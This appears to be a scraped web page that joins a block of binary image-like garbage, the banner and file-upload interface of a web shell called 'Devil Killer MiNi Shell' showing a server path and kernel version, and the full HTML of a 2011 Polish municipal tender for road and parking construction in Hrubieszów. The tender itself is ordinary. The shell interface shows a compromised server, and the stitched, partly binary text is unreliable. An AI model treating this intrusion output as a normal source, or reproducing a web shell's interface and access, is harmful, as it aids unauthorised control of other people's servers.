JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/111551-N-2011.html

<p class="kh_header"><b>Hrubieszów: Budowa dróg gminnych na Osiedlu Basaja
oraz budowa parkingów w pasie drogowym
ul. Polna i Mickiewicza w Hrubieszowie</b><br>
<b>Numer ogłoszenia: 111551 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dróg gminnych na Osiedlu Basaja
oraz budowa parkingów w pasie drogowym
ul. Polna i Mickiewicza w Hrubieszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Budowa dróg gminnych na Osiedlu Basaja oraz budowa parkingów w pasie drogowym ul. Polna i Mickiewicza w Hrubieszowie         w zakresie jn.:

1.	Budowa dróg gminnych w Osiedlu Basaja w ulicach: Różana Nr 111416 L,  Makowa Nr 111414L, Fiołkowa Nr 111413 L, Konwaliowa Nr 111415 L, Pobereżańska Nr 111417 L. 
1.1	 ul. Różana - długość 422,00 mb 
-	jezdnia - 7,0 m,  chodniki obustronnie  o szer. 2,0 m ,ciąg pieszo jezdny o szer. 4,0 ÷6,0 m, wjazdy na posesje,  zieleń niska  2,0÷4,0 m
-	kategoria ruchu KR-2, obciążenie 100 kN/oś, klasa drogi Z, szerokość pasa drogowego 20,0÷25,0 m,
-	Nawierzchnia drogi  : warstwa ścieralna z betonu asfaltowego gr.4 cm warstwa wiążąca z betonu asfaltowego gr.7 cm, podbudowa zasadnicza z betonu asfaltowego gr.8 cm, podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie gr.20 cm, podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 16 cm,
-	 nawierzchnia chodników : kostka brukowa gr. 6 cm  na   podsypce  cementowo - piaskowej gr. 3 cm,
-	nawierzchnia ciągu pieszo -jezdnego oraz zjazdów na posesje: kostka brukowa gr.8 cm na podsypce cementowo- piaskowej gr. 4 cm,
-	kanalizacja deszczowa na całym odcinku ulicy: z kielichowych, dwuwarstwowych  polipropylenowych rur strukturalnych o sztywności obwodowej SN-8 (8,0 kN/m/2),
-	oświetlenie uliczne na całym odcinku ulicy - na słupach stalowych h=10 m wraz wysięgnikiem i oprawami o mocy 250W.
1.2	 ul. Makowa  - długość 115,0mb
-	jezdnia - 6,0 m ,  chodniki obustronnie  o szer. 1,5  m , zieleń niska  2 x1,0 m,
-	kategoria ruchu KR-1, obciążenie 100 kN/oś,  klasa drogi L, szerokość pasa drogowego     12,0 m,
-	Nawierzchnia drogi  : warstwa ścieralna z betonu asfaltowego gr.4 cm warstwa wiążąca z betonu asfaltowego gr. 6 cm, podbudowa zasadnicza  z kruszywa łamanego stabilizowanego mechanicznie gr.15 cm, podbudowa pomocnicza         z gruntu stabilizowanego cementem  gr. 25 cm,
-	nawierzchnia chodników : kostka brukowa gr. 6 cm  na   podsypce  cementowo - piaskowej gr. 3 cm,
-	nawierzchnia zjazdów na posesje: kostka brukowa gr.8 cm na podsypce cementowo - piaskowej gr. 4 cm,
-	kanalizacja deszczowa na całym odcinku ulicy: z kielichowych, dwuwarstwowych  polipropylenowych rur strukturalnych o sztywności obwodowej SN-8                (8,0 kN/m/2),
-	oświetlenie uliczne na całym odcinku ulicy - na słupach stalowych h=10 m wraz wysięgnikiem i oprawami o mocy 250W.
1.3	 ul. Fiołkowa - długość 115,0 mb
-	jezdnia - 6,0 m ,  chodniki obustronnie  o szer. 1,5  m , zieleń niska  2 x 1,0 m,
-	kategoria ruchu KR-1, obciążenie 100 kN/oś, klasa drogi L, szerokość pasa drogowego 15,0 m,
-	Nawierzchnia drogi: warstwa ścieralna z betonu asfaltowego gr.4 cm, warstwa wiążąca z betonu asfaltowego gr. 6 cm, podbudowa zasadnicza  z kruszywa łamanego stabilizowanego mechanicznie gr.15 cm, podbudowa pomocnicza         z gruntu stabilizowanego cementem gr. 25 cm,
-	 nawierzchnia chodników: kostka brukowa gr. 6 cm  na   podsypce  cementowo     - piaskowej gr. 3 cm,
-	nawierzchnia zjazdów na posesje: kostka brukowa gr.8 cm na podsypce cementowo - piaskowej gr. 4 cm,
-	kanalizacja deszczowa na całym odcinku ulicy: z kielichowych, dwuwarstwowych polipropylenowych rur strukturalnych o sztywności obwodowej SN-8 (8,0 kN/m/2),
-	oświetlenie uliczne na całym odcinku ulicy - na słupach stalowych h=10 m wraz wysięgnikiem i oprawami o mocy 250W.
1.4	 ul. Konwaliowa - długość 50,0 mb
-	 jezdnia - 6,0 m ,  chodniki obustronnie  o szer. 1,5  m, zieleń niska  2x 1,0 m,
-	 kategoria ruchu KR-1, obciążenie 100 kN/oś, klasa drogi L, szerokość pasa  drogowego 15,0 m
-	 nawierzchnia drogi: warstwa ścieralna z betonu asfaltowego gr.4 cm,        warstwa wiążąca z betonu asfaltowego gr. 6 cm, podbudowa zasadnicza                z kruszywa łamanego stabilizowanego mechanicznie gr.15 cm,  podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 25 cm, 
-	nawierzchnia chodników : kostka brukowa gr. 6 cm  na   podsypce  cementowo - piaskowej gr. 3 cm
-	nawierzchnia zjazdów na posesje: kostka brukowa gr.8 cm na podsypce   cementowo - piaskowej gr. 4 cm,
-	kanalizacja deszczowa na całym odcinku ulicy: z kielichowych, dwuwarstwowych polipropylenowych rur strukturalnych o sztywności obwodowej SN-8 (8,0 kN/m/2),
-	oświetlenie uliczne na całym odcinku ulicy - na słupach stalowych h=10 m wraz wysięgnikiem i oprawami o mocy 250W
1.5	ul. Pobereżańska - ciąg  pieszo- jezdny - 160,0 mb
-	szerokość pasa drogowego 5,0 m,
-	jezdnia - 4,0 m,
-	nawierzchnia: warstwa ścieralna z kostki betonowej gr. 8 cm, podsypka cementowo- piaskowa gr. 3 cm, podbudowa zasadnicza z kruszywa  łamanego stabilizowanego mechanicznie gr. 20 cm, podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 20 cm,
-	nawierzchnia zjazdów na posesje: kostka brukowa gr.8 cm na podsypce   cementowo- piaskowej gr. 4 cm,
-	kanalizacja deszczowa na części ulicy: z  kielichowych, dwuwarstwowych  polipropylenowych rur strukturalnych o sztywności obwodowej SN-8 (8,0 kN/m/2),
-	oświetlenie uliczne na całym odcinku ulicy - na słupach stalowych h=6,0 m wraz wysięgnikiem i oprawami o mocy 75 W. 

EFEKTY RZECZOWE PLANOWANE DO UZYSKANIA W WYNIKU WYKONANIA ZAKRESU ROBÓT OPISANYCH J.W  :
-	Drogi  gminne  o nawierzchni asfaltowej - 702,00 mb ( 5029,00 m2)
-	Chodniki o nawierzchni  z kostki brukowej gr.6 cm - 2084,60 m2
-	Ciągi pieszo jezdne i zjazdy do posesji ( 37 szt.) - 2187,80 m2 (w tym 160,00 mb       - ul. Pobereżańska)
-	Krawężnik betonowy - 1890,00 mb
-	Obrzeże chodnikowe  20x6 - 1340,00 mb
-	Obrzeża chodnikowe 30x8 - 720,00 mb
-	Oznakowanie pionowe - znaki drogowe pionowe - 23 szt. 
-	Oznakowanie poziome -175,98 m2
-	Oświetlenie uliczne -  51 szt. słupów wraz z oprawami i lampami
-	Kanalizacja deszczowa  O 200 - 400 - 918,50 mb

2.	Poszerzeniu istniejącej jezdni ulicy Polnej (przebudowa drogi powiatowej- skrzyżowanie ulic Polna Nr 3476L i Mickiewicza Nr 2473 L) wraz z budową miejsc postojowych i parkingów w ulicach Mickiewicza i Polna.
2.1	Wykonanie nawierzchni  dróg z betonu asfaltowego ( przebudowa skrzyżowania ulic Polna - Mickiewicza ) - 268 m2
-	jezdnia 7,0 m + dodatkowy pas o szer. 4,0 m dla wydzielenia lewoskrętu w ul. Mickiewicza,
-	kategoria ruchu KR-2,
-	szerokość pasa drogowego - 20 m.
           Nawierzchnia :
-	warstwa ścieralna z masy betonu asfaltowego gr. 4 cm,
-	warstwa wiążąca z betonu asfaltowego gr. 7 cm,
-	podbudowa zasadnicza z betonu asfaltowego  gr. 8 cm,
-	podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie    gr. 20 cm,
-	podbudowa pomocnicza z gruntu stabilizowanego cementem gr.22 cm,
2.2	Wykonanie miejsc postojowych w ul. Polnej o wym. 2,50x4,50 m -  30 szt.
-	nawierzchnia - z kostki brukowej gr. 8 cm,
-	podsypka cementowo- piaskowa  gr. 3 cm,
-	podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie       gr. 20 cm,
-	podbudowa pomocnicza z gruntu stabilizowanego cementem gr.20 cm.
2.3	Wykonanie chodnika w ul. Polnej - 134 m2
-	 nawierzchnia chodników : kostka brukowa gr. 6 cm  na   podsypce  cementowo - piaskowej gr. 3 cm
2.4	Wykonanie miejsc parkingowych w  ul. Mickiewicza - 48 szt. wymiary 2,50 x 6,0 m oraz 3,60x 4,50 (miejsca dla niepełnosprawnych)
-	nawierzchnia - z kostki brukowej gr 8 cm,
-	podsypka cementowo- piaskowa  gr. 3 cm,
-	podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie  gr. 20 cm,
-	podbudowa pomocnicza z gruntu stabilizowanego cementem gr.20 cm.
EFEKTY RZECZOWE PLANOWANE DO UZYSKANIA W WYNIKU WYKONANIA ZAKRESU ROBÓT OPISANYCH   J.W:
-	 Drogi  powiatowe   o nawierzchni asfaltowej - 268,00 m2
-	 Miejsca postojowe i parkingowe o nawierzchni z kostki brukowej 78 szt.- 1080,00 m2  
 chodnik z kostki  brukowej  gr. 6 cm - 134,00 m2
-	 Krawężnik betonowy - 884,00 mb
-	 Obrzeże chodnikowe  20x6 - 100,00 mb
-	 Oznakowanie pionowe - znaki drogowe pionowe - 6 szt. 
-	 Oznakowanie poziome -264,00  m2

3.	Włączeniu drogi  gminnej - ul.  Różanej Nr 111416L do drogi krajowej Nr 74 - ul. Basaja
3.1.	Wykonanie  nawierzchni  drogi z betonu asfaltowego - 800 ,00 m2
Kategoria ruchu KR-3, powiązanie ulicy Różanej z Drogą Krajową Nr 74 poprzez skrzyżowanie z wyspą typu kropla
Nawierzchnia :
-	warstwa ścieralna z masy betonu asfaltowego gr. 4 cm
-	warstwa wiążąca z betonu asfaltowego gr. 7 cm
-	podbudowa zasadnicza z betonu asfaltowego  gr. 8 cm
-	podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie  gr. 20 cm
-	podbudowa pomocnicza z gruntu stabilizowanego cementem gr.22 cm
-	zabezpieczenie geosiatką nawierzchni przed spękaniami - siatka z włókien węglowych wstępnie powlekanych  bitumem o wytrzymałości 100 kN/m
3.2.	Wykonanie wyspy dzielącej i cieku przykrawężnikowego - 189,09 m2
-	nawierzchnia z kostki brukowej gr. 8 cm  na podsypce cementowo-piaskowej gr. 4 cm
3.3.	Wykonanie chodników z kostki brukowej - 174,63 m2
-	nawierzchnia z kostki  brukowej gr. 6 cm na podsypce cementowo-piaskowej gr. 3 cm
3.4.	Wykonanie kanalizacji deszczowej z kielichowych, dwuwarstwowych  polipropylenowych rur strukturalnych o sztywności obwodowej SN-8 (8,0 kN/m2 ) - 23,3 m 

EFEKTY RZECZOWE PLANOWANE DO UZYSKANIA W WYNIKU WYKONANIA ZAKRESU ROBÓT OPISANYCH J.W  :
-	Drogi krajowe    o nawierzchni asfaltowej - 800,0 m2
-	chodnik z kostki  brukowej  gr. 6 cm - 174,63 m2
-	krawężnik betonowy - 372 ,00 mb
-	Obrzeże chodnikowe  20x6 - 364,00 mb
-	Oznakowanie pionowe - znaki drogowe pionowe - 20 szt. 
-	Oznakowanie poziome -293,35  m2
-	kanalizacja deszczowa - 23,3 m



OGÓŁEM  : 
EFEKTY RZECZOWE PLANOWANE DO UZYSKANIA W WYNIKU  REALIZACJI  CAŁOŚCI ZADANIA :
-	Drogi  gminne  o nawierzchni asfaltowej - 702,00mb  (5029,00 m2)
-	Drogi  powiatowe  o nawierzchni asfaltowej -  268,00 m2
-	Drogi krajowe  o nawierzchni asfaltowej -  800,00 m2
-	Chodniki o nawierzchni  z kostki brukowej gr.6 cm - 2393,23m2
-	Ciągi pieszo jezdne i zjazdy do posesji (37 szt.) - 2187,80 m2 (tym ul.           Pobereżańska 160,00 mb)
-	Miejsca postojowe i parkingowe  - 78 szt.  (1080,00 m2)
-	Krawężnik betonowy - 3146,00 mb
-	Obrzeża chodnikowe 20 x 6 - 1804,00 mb
-	Obrzeża chodnikowe 30 x 8 - 720,00 mb
-	Oznakowanie pionowe - znaki drogowe pionowe - 49 szt. 
-	Oznakowanie poziome - 733,33  m2
-	Oświetlenie uliczne - 51 szt. słupów wraz z oprawami i lampami
-	Kanalizacja deszczowa  O 200 ÷400 - 941,80 mb

Szczegółowy zakres oraz technologię robót określa dokumentacja projektowa stanowiąca Załącznik nr 11. 

Przedmiary robót i kosztorysy załączone do specyfikacji stanowiące Załącznik 2  są opracowaniem wtórnym w stosunku do projektu dokumentacji projektowej. Zawierają zestawienie przewidywanych robót w celu zobrazowania skali zamierzenia budowlanego i ułatwienia Wykonawcom oszacowania kosztów realizacji inwestycji, dlatego co do zasady pełnią funkcję pomocniczą, gdyż cena za wykonanie przedmiotu zamówienia jest CENĄ RYCZAŁTOWĄ 

Jeżeli w SIWZ przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy,  patent  lub  pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe      i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych o parametrach nie gorszych niż wskazane.
Wykonawca może zastosować materiały równoważne, ale muszą one być nie gorsze od materiałów zastosowanych w dokumentacji lub muszą przewyższać jakością materiały ujęte w dokumentacji. W przypadku zastosowania materiałów równoważnych dotyczących zamówienia wykonawca przedstawi niezbędne certyfikaty lub badania dla wszystkich materiałów tzw. równoważnych na etapie składania ofert..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.23.10.00-5, 45.23.20.00-2, 45.23.14.00-9, 45.23.30.00-9, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości  100.000  zł. (słownie: sto tysięcy).
2.	Wadium należy wnieść w terminie do dnia 26.04.2011 do godz. 09.00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj.              w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy w tym okresie,  wykonania minimum jednej roboty odpowiadającej rodzajem robocie będącej przedmiotem zamówienia. Za robotę odpowiadającą swoim rodzajem  robotom stanowiącym przedmiot zamówienia, Zamawiający  uzna co najmniej jedną robotę budowlaną polegającą na budowie dróg o nawierzchni asfaltowej wraz z odwodnieniem oraz oświetleniem o wartości nie mniejszej niż 3.000.000 zł.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
1)	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia tj. dysponowania  co najmniej   po jednej  osobie, które  posiadającą  uprawnienia budowlane w zakresie kierowania robotami budowlanymi                w specjalności drogowej,  elektrycznej i sanitarnej. 
Warunek zostanie spełniony po przedłożeniu wykazu i oświadczenia jn:
1)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia,                       w szczególności z uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie odpowiedzialnych za kierowanie robotami budowlanymi  w specjalnościach: 
-	drogowej, z jednoczesnym pełnieniem funkcji kierownika budowy
-	elektrycznej, w zakresie sieci, instalacji i urządzeń elektrycznych                         i elektroenergetycznych,
-	sanitarnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
2)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał  się sytuacją ekonomiczną         i finansową zapewniającą wykonanie zamówienia, a w szczególności wykażą dysponowanie środkami finansowymi lub zdolnością kredytową na kwotę co najmniej 1.000.000 złotych. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.
Jeśli wykonawca z uzasadnionej przyczyny nie może przedstawić wymaganych dokumentów celem potwierdzenia spełniania warunku dotyczącego jego sytuacji ekonomicznej i finansowej, może przedłożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	W przypadku udziału podwykonawców - załącznik nr 6
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji  
     niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia    - jeżeli   dotyczy 
